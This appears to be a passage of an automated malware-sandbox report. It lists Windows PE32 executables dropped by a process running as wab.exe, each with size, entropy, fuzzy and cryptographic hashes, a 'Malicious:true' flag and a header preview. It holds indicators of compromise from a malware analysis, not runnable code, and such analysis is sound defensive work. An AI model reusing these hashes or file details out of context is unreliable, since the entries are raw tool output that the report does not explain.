                                                                              Entropy (8bit):6.5248807406109455
                                                                              Encrypted:false
                                                                              SSDEEP:49152:UTaRe7mkn5KLvD5qGVC008Jpb4tgLUgGEsLABD5wTQh07yrLMLl9YPhe:3I72LvkrCpbxJRoIMx
                                                                              MD5:4EFF0AAEA467EF4BEA361BBDF3E0C47E
                                                                              SHA1:F6B0C7F4065F41C95C81CC0578AFCBC2352ED2A6
                                                                              SHA-256:C464CD450FB9402368912118E6E5AC38B995032C2FDFE370A7C4FBC351C1673E
                                                                              SHA-512:5E55C90A8FC5C1F12FBC93CAECC3235941087E1B3E7756EF3416E27D8150594DAC47E1530C6B57373A715FD0715872D4B3E1CE3C5FE2D717ED7F33D031E842BE
                                                                              Malicious:true
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):1535528
                                                                              Entropy (8bit):6.485837874399157
                                                                              Encrypted:false
                                                                              SSDEEP:12288:A406WoyJHeFOqDRA7uKk+TjnkgiMnQq+UI7MBImQWkv7yfOYIXbwohMA+nkXZnHC:NW9Jml9mmijZiMnF+ZxmQWcbLw8Vi
                                                                              MD5:DEC9D082187C2E2FD9CEC20ED67609C6
                                                                              SHA1:967A517741026C7A019909DD3F49832C3BAEE723
                                                                              SHA-256:7AC72A6466BF243F870520E026999B2920E851DC16DFA44241EAB92F1B371CD2
                                                                              SHA-512:568B47F306872D8B23DA5ACD9419D1A53A3DC3D802157BC74E40B961D0DA70C2BA09B22AC3D24581917020FC0874C12C498390E208BF0FA54714707B422982D3
                                                                              Malicious:true
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):1273384
                                                                              Entropy (8bit):6.477930816210187
                                                                              Encrypted:false
                                                                              SSDEEP:12288:U5eN+kL3gVeYt/uakJMtleRO40BbdJrPVJAzAlPY6mYzJuomPMA+nkVogIkd9:UwNHwoYhua6MtERO4qbBJTY6mY1uIgp
                                                                              MD5:D52F2208641A2193606B49DE2AC097C0
                                                                              SHA1:B5AFE076C247DC9D0A51C5D99C9C6870C48E8D3A
                                                                              SHA-256:277C7CB868F05FC05807E1B84B0B01B4B53BAE16BF45576A7A56786FF7087627
                                                                              SHA-512:134102FC9A5D24A0B2E7E273F3027543F2847B6C3D7E6CE1763D54F2D4FA80A3C0A6581F641064C5F878DEB8A541AC773454968C5453090F03F5C2427B3AFE4E
                                                                              Malicious:true
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):4251688
                                                                              Entropy (8bit):6.49452169775478
                                                                              Encrypted:false
                                                                              SSDEEP:49152:ppawZh+vD5oLv9eqJ/iUPnspBu/MLPgyLMLQB4gQDyJ0ryMOAqk9l/hO2y/BT:+ehFLvTQDpB5oSOmlBl
                                                                              MD5:D7F3BB1C8DDD48162CFB914CC0BD2B28
                                                                              SHA1:7C88DEA6E637E95D486769CAC5195D76D61CAD8D
                                                                              SHA-256:A6578F4E1089C55627499E1EA32386041BFEE10CD3ADB90F9D2098F90A92C99A
                                                                              SHA-512:5B9276369DA9D1962716AF74C3098ABA884FC56E5067A00DCC17A1924204B63EF8250003F50FEC43EC676DDC7357F398017ACDCFB89A4B4B6351394822797237
                                                                              Malicious:true
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):1319976
                                                                              Entropy (8bit):6.467419492813544
                                                                              Encrypted:false
                                                                              SSDEEP:12288:+yeb4D2VLtrQA1Yim7XGLZxHwlqxlThfkY8bo0cITiLEpPoVfMA+nkthF2g0oz5:+iD2VmA1YXQHwlklb8boUuWPg2gX
                                                                              MD5:1DA657653D9309EC964A8A4EE00C297F
                                                                              SHA1:EDA6072D4BBB59A9840B746C9A3B51E3FCFF746F
                                                                              SHA-256:FF51B182FA83FE86E0B41327CCB61191DC85DD01E39FE31E9F36F06183795FD5
                                                                              SHA-512:2F37150DB52489D79CE150EB1E29B14F1652244CE7BE7D7B01B179003392DA57D4314207720A59683604A34A192F49E9C8B06405CABAF0CE51657D65BFED1AA0
                                                                              Malicious:true
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):1273384
                                                                              Entropy (8bit):6.477930816210187
                                                                              Encrypted:false
                                                                              SSDEEP:12288:U5eN+kL3gVeYt/uakJMtleRO40BbdJrPVJAzAlPY6mYzJuomPMA+nkVogIkd9:UwNHwoYhua6MtERO4qbBJTY6mY1uIgp
                                                                              MD5:D52F2208641A2193606B49DE2AC097C0
                                                                              SHA1:B5AFE076C247DC9D0A51C5D99C9C6870C48E8D3A
                                                                              SHA-256:277C7CB868F05FC05807E1B84B0B01B4B53BAE16BF45576A7A56786FF7087627
                                                                              SHA-512:134102FC9A5D24A0B2E7E273F3027543F2847B6C3D7E6CE1763D54F2D4FA80A3C0A6581F641064C5F878DEB8A541AC773454968C5453090F03F5C2427B3AFE4E
                                                                              Malicious:true
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):225232
                                                                              Entropy (8bit):5.590089703655568
                                                                              Encrypted:false
                                                                              SSDEEP:3072:/rkBcxiNNpCPPQPg2cluc/Xswbz8cz3quKoNX1gd:YcwVz4B8c37KoNX1q
                                                                              MD5:0822CF9C8E0FBEB192BAF4924558F9EF
                                                                              SHA1:D051B71CC415AAB8760593D963060600EA1D561B
                                                                              SHA-256:68CA5048EBA160EC9CF32A2D8F48007D3559AF1E5540A77F4A8303B5B76C0809
                                                                              SHA-512:6A1BED580C552BACFF1F66CDB92E15015A42559E7771245825C7B63C0D69A1621676E68B2430F6F5D6D2ED87A4F44BFC5B0CE2A9B1F82DA68EB8012A5198F84F
                                                                              Malicious:true
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):247760
                                                                              Entropy (8bit):5.4946983581508615
                                                                              Encrypted:false
                                                                              SSDEEP:3072:/rk4W4l/DReos0gXf+EvC6C36eCWdMuoB+ISzBqUGxNtvKAbFP3cSEt0phcxAT5U:fl/DRfkTC3dM7B+mCivAT
                                                                              MD5:2FB36922FE765D104C467862052EBEF8
                                                                              SHA1:22A4F92530018C5751DFFC31CEECA92FD6595960
                                                                              SHA-256:255C40122758C9EBBAB4D7EED934874AAC93CA0115EB3908E7D6BF284027B34C
                                                                              SHA-512:7967C653DDB8DCCDD70CACAA3DAF5FB653D070D572F9527798A494B405DD0BB0D9A4F97AD9B370F1BBE2CDBD9C75376682949AAAC9E3AB47687E1536A3D5D6BE
                                                                              Malicious:true
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):142288
                                                                              Entropy (8bit):6.010441905708692
                                                                              Encrypted:false
                                                                              SSDEEP:3072:/rkE684ePKoTB+IvoAewtxUff8aohGme+YDfYz8FrR7:jrTB+AleYIkifYUF
                                                                              MD5:60B8D642590E6752206C2D4C4572F552
                                                                              SHA1:F90AEEF8450BA2672909E794882E252DAF200FE3
                                                                              SHA-256:0CCA065FD181AAAE1D87076E56FEFBDCE2D6C038550ED6EF7E24A6D377C51F55
                                                                              SHA-512:FB0E15378BEE48594701460890635BD3710C35A43A0B52C3DF2E1A3B7C629541A377BC21C2EAC963667047DC210EEDB66D5AD6B88D98FD4E0A24288F0B60DF21
                                                                              Malicious:true
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):259024
                                                                              Entropy (8bit):5.843284257427227
                                                                              Encrypted:false
                                                                              SSDEEP:3072:/rknXEV0tle+5IbvBCMmNginHy8lZoY46Mu/rLogrlKq9YXI35EvMl:sUVwleMITTmNv1ohWsqYI354I
                                                                              MD5:724461D9FADE55B6FB8024A7CECE86BD
                                                                              SHA1:31C171F23D66938373F3E313412E2E27F1FB1F6D
                                                                              SHA-256:BE208C4A573B7067F7368C334ABB45ACA68CE3A6672CD5E47DE908B59880A4CF
                                                                              SHA-512:E1AEB088FD312F5D1EAD891D2FCE7958CB7EDA9099407F875604A39C7B44651179EE6DB97A10C54C7F50A85C5EF404E07278C1A0FFD15AE779C5FAD2391BEAD4
                                                                              Malicious:true
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):305120
                                                                              Entropy (8bit):6.228503123962384
                                                                              Encrypted:false
                                                                              SSDEEP:6144:DFKucTm3RhMfoSG5dCd7hjAOe9UmXY2Gh++CgBlPMoX:xKucTm3RhMfoSBjA9U2Yxh+Zgb7X
                                                                              MD5:53B080AD4D228F74C8CD989A7EA47A1A
                                                                              SHA1:BBA52738C2A06D220B14944DCD48C9C1314115BA
                                                                              SHA-256:C15914A8A2F7504442109FB22FEF3C8C76DC10F5F1621A27D18336CE468616D0
                                                                              SHA-512:425B62091571FFA59B344A4E3E6F17EE7E1D5BFA182D3FE417EA7EC76FBE68330019FAFC17004C227FC90B5D8523FB0C71D61FF9238E67A26E4E48730AB67BFD
                                                                              Malicious:true
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):142288
                                                                              Entropy (8bit):6.011172190675141
                                                                              Encrypted:false
                                                                              SSDEEP:3072:/rkraivqozB+IvcZ4wrZU+l/8xoAm2+YDfYz8GrR/:OzB+Aw4CZNr2fYLl
                                                                              MD5:CBF0D1C5689D989C73C63890EC44858C
                                                                              SHA1:05CD5077D1E330666851CE83BBC1D97756B8577E
                                                                              SHA-256:ACB8B4B0F65E35309EE1B50C516BDF43679F1D7250C25DA2D8126B7B7920D60A
                                                                              SHA-512:5869DA0F45AE6DCA785DCE0B0619B220C74687BD3CA3E68A01591592301CF26B89FF6CBF5F8FE521CF13809C10093B0865BA53A49A77DD474FBF864819CAD889
                                                                              Malicious:true
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):1640416
                                                                              Entropy (8bit):7.892301842372348
                                                                              Encrypted:false
                                                                              SSDEEP:24576:jwy53G70SeiN9YqxCCg83udcWXDYajPF2410wuRpGfFki94qSe/wsNfzUG:8y53w24gQu3TPZ2psFkiSqwozX
                                                                              MD5:AA658D62A81B286BF555093E0AAE22B9
                                                                              SHA1:C0C8C8431ABA7EBCA41D047BCAC3BC481759FBCC
                                                                              SHA-256:AA0604845394BED07D335F2A840B3375466BB6707DC0AE45A1D1587D1026567A
                                                                              SHA-512:6F6AA71DABEA96D667E0379D691CE37284FFF7E3814392C5725256E4A9A0091B0C23DF47E04D01FCF13097474A281E8105909DAC9B7DAC98E125A2BBFCA21DC2
                                                                              Malicious:true
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):144866
                                                                              Entropy (8bit):5.808234044484307
                                                                              Encrypted:false
                                                                              SSDEEP:3072:/rkcRD5b0qZ7y4jem7y6tkNRCywDw1DiJkuKUY:vD5lZ7y4j9KT4DteUY
                                                                              MD5:F9FC6C9198B51079EE2589C189FD0FF2
                                                                              SHA1:AFB098F62B18E858CA1287352D5E0C1F4712BDCA
                                                                              SHA-256:4B64D3577D06DC4C74DB624776BE20600B860D8C8E8CC1F63334AA7156794B69
                                                                              SHA-512:169ED1F88471E03760789A7B5F87AE0682F54628AE74E379377B0D7FFE89EA93B40CB88C8AB59BB8A9F01646A36289C3B681EE18B1E6ADC73A229E9D794DC9E3
                                                                              Malicious:true
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):280480
                                                                              Entropy (8bit):6.179980245461866
                                                                              Encrypted:false
                                                                              SSDEEP:6144:FPr2vXzrEbslNp/JNsJKQl0GkRAqVNf0O3:FDQXRVTZu0GP+ZR
                                                                              MD5:370ADDBC1D77A867416A1AA2BE63DD1F
                                                                              SHA1:48FB1005A536927F94D20B289D2A583FAC85B094
                                                                              SHA-256:FC50096512FB196ED5608FFC49824756C73D5CBD91D2300063C2E99FA2E00E11
                                                                              SHA-512:9ED89D8887229B9D2AAEA4C0FAE4914C7FBB333BE455AF840E3FF4E60BF95895EAF63CBDFAF19A80DCEA737EB8EC902E945AB1B645D8365FD8C2DED8BDB606EC
                                                                              Malicious:true
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):4473576
                                                                              Entropy (8bit):6.558895341897284
                                                                              Encrypted:false
                                                                              SSDEEP:98304:/kkCqyDEY7+o3OBvfGVY+40yajyS+9s/pLOq:/kkCqaE68eV+0y8E6L1
                                                                              MD5:4855130B5C1085421920C85105178634
                                                                              SHA1:A33353F42A13A7250D66326F8770A286E5774729
                                                                              SHA-256:8624CD3947C884673C1090CCED557CDAC8075E120C1EB2EF4B9C01B694370AFA
                                                                              SHA-512:97D9889F9385DB775A685A62A52EC371BDEE291ECF4877DF0A6098F01F6BD5226452B3893C002A2914B9AE511837FF8090E6DB297C0CDFE3FADBE49A6101CFE6
                                                                              Malicious:true
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):501656
                                                                              Entropy (8bit):6.206848688272987
                                                                              Encrypted:false
                                                                              SSDEEP:12288:YLH18t6x1hjaNHBlfBVDZS82JninSFVlDW:YLOwxyNHBVEHRiSFVlDW
                                                                              MD5:37449BF94D37C1203B35D7EAEE21566E
                                                                              SHA1:553E7B35481F9087EA91DC99985DA9F9349F60DE
                                                                              SHA-256:54800DA609BCA03BA0EFD3EBA90DEC57E644D69352FA8F905FDA2DB2B8897F11
                                                                              SHA-512:51FC24DFD566AEBAB7051FC2862018DE7840A38D1BE9E092D037BF7D1ECC63821FBE391CE68FA0A4B4239A34A37526EE27D1E5FDA480AE62EAC5B1AE23752BD1
                                                                              Malicious:true
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):1637776
                                                                              Entropy (8bit):6.283298841131721
                                                                              Encrypted:false
                                                                              SSDEEP:24576:x7Z1jyzcKSmKsvwMZJ1XBsn/gu2bRC6dulyyn2WdXM6cWlLIJ:5Z1tKTwMZJ1XBsn/UC6dugWA
                                                                              MD5:8CFAB955578F236C5CDB06D461AE2049
                                                                              SHA1:E7E38519DB3CAC5935215176B8654BEC267FD6B1
                                                                              SHA-256:EAFC0DEE1D623B6DE32FFA7154CFD9AD4414350C0E2E2E5468C9B7BC03F9A923
                                                                              SHA-512:59FDA248B4FE21C505873AFEB88EA3A1A545A5EB69C6C8083A302F7FE6A8AE9CEF39EE29B95EA32CDB3F6B1F7B115C716BF3C82676556ADBDD2842A50265294B
                                                                              Malicious:true
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):224632
                                                                              Entropy (8bit):5.346658740278611
                                                                              Encrypted:false
                                                                              SSDEEP:3072:/rk3FtCsHjgU7HOg6KTe/+EypudsD22QnSUEhydebz41:Stx0SA+EySaQKeUz41
                                                                              MD5:5936E6A9592A373B502A4F40CEB5D274
                                                                              SHA1:BD0C0A126F79B77E6461668546FFB4B5702BFAB1
                                                                              SHA-256:CFBB8E8FB6B042DB6E2293FDE43FA24B9AE2670AD0445A56DE3214E4901088F7
                                                                              SHA-512:DABABC717ACD000A418A2D118EE497C65C62B1FAF4318BAF1DB53CA0D06F88F563CDAFFDF9DEB73680179EB0CED2E45F3A22B865F6B655B299CFC0450820CE08
                                                                              Malicious:true
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):431336
                                                                              Entropy (8bit):5.752299246327897
                                                                              Encrypted:false
                                                                              SSDEEP:6144:lzBRUKCBTwZVr2miTVVmVVV8VVNVVVcVVVxVVVPVVlVVVRVVVtVVWV60jVLVVOV3:lzBRnCBOrsBOBf
                                                                              MD5:D5945FAB44111E3D0DB2861C8AC32EDC
                                                                              SHA1:FB811D4D198C79FB29A359045415EDDA3C49E877
                                                                              SHA-256:A059F0CC641E7736354E4A12A830D51A930E5118AA1B95E70F1EE1486733B931
                                                                              SHA-512:4C05B14F24C1720AB7A11A982C4955D6AB395CA272927810EB4AC53AD97C577E23902340947014EB99D9E39F1FBBB09C83A185158190800A097B33711A22606B
                                                                              Malicious:true
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):175160
                                                                              Entropy (8bit):5.636057353438849
                                                                              Encrypted:false
                                                                              SSDEEP:3072:/rkS/VpSIcnsHKTe8LnZCA5OfkQAm95kQOJeqx6u:NtkIpdA5OfzDUeqx6u
                                                                              MD5:F59DCF1E724D7EA7DFB018B3C71C8D2E
                                                                              SHA1:EB71834CA1B44C7C11FCA8A77BD8522FA967A8CD
                                                                              SHA-256:EA930FA7ABE8831AC22AEF0BF777A332DFCB013A44780E313C6659AEC0D52A73
                                                                              SHA-512:6C1D461DDFA42DD74847008B02D1EECA1B311BCE14FF1D139E22A0120CBFF7FF0AA0695BCA6B111236794B0616E9B0A42BEF6A3C6B6DEE2C7F4018B162A06F44
                                                                              Malicious:true
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):3162480
                                                                              Entropy (8bit):6.453693784011875
                                                                              Encrypted:false
                                                                              SSDEEP:49152:dnW4jqFRZega3xejvY7GQOx4K1fm15FKqO7t78Ity6fod76lmlW8U:gs3OBj4UmOH
                                                                              MD5:35EF8966CF2F29F477E46516D8A993FA
                                                                              SHA1:979AD1DB259F4964EC546671FF151062CF61C6F0
                                                                              SHA-256:2BDF1627356719CE8433F93B92B3397D1828CC4BE2D23E991AEEB7758C2FA825
                                                                              SHA-512:CAF7B8F2240F1D1995744F1FCD893E565D747B80D46D1E48BB0B321ACE166D338EF566CAD1BA441DF8FDE91FC8EF6BA7AB7F198755717EA6DB67CAE862A4730F
                                                                              Malicious:true
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):1309408
                                                                              Entropy (8bit):6.458547418142826
                                                                              Encrypted:false
                                                                              SSDEEP:24576:n+sGOL9NLM3r4Viwj6KLqGua43loEeUFmwv:n4AA4eGua43lgUFrv
                                                                              MD5:FC820BCEC712B78BA14EA3640EE769B2
                                                                              SHA1:FB2466FBD7CDA915B673D193C47273207C3AEF4A
                                                                              SHA-256:7231DBFC40D9873E4BC1DC1BB1009DA4B4B2AC88DECD32C1DDE9972879AF3E80
                                                                              SHA-512:A4D82FAA7F427E76A149CB4A1B71CF8FFE8AB7A2D320036619885DDD3F0FDF28F16D46B34644D89439BC9A3A018D9DBE08970A098A9FC5CF86802427745B5CCA
                                                                              Malicious:true
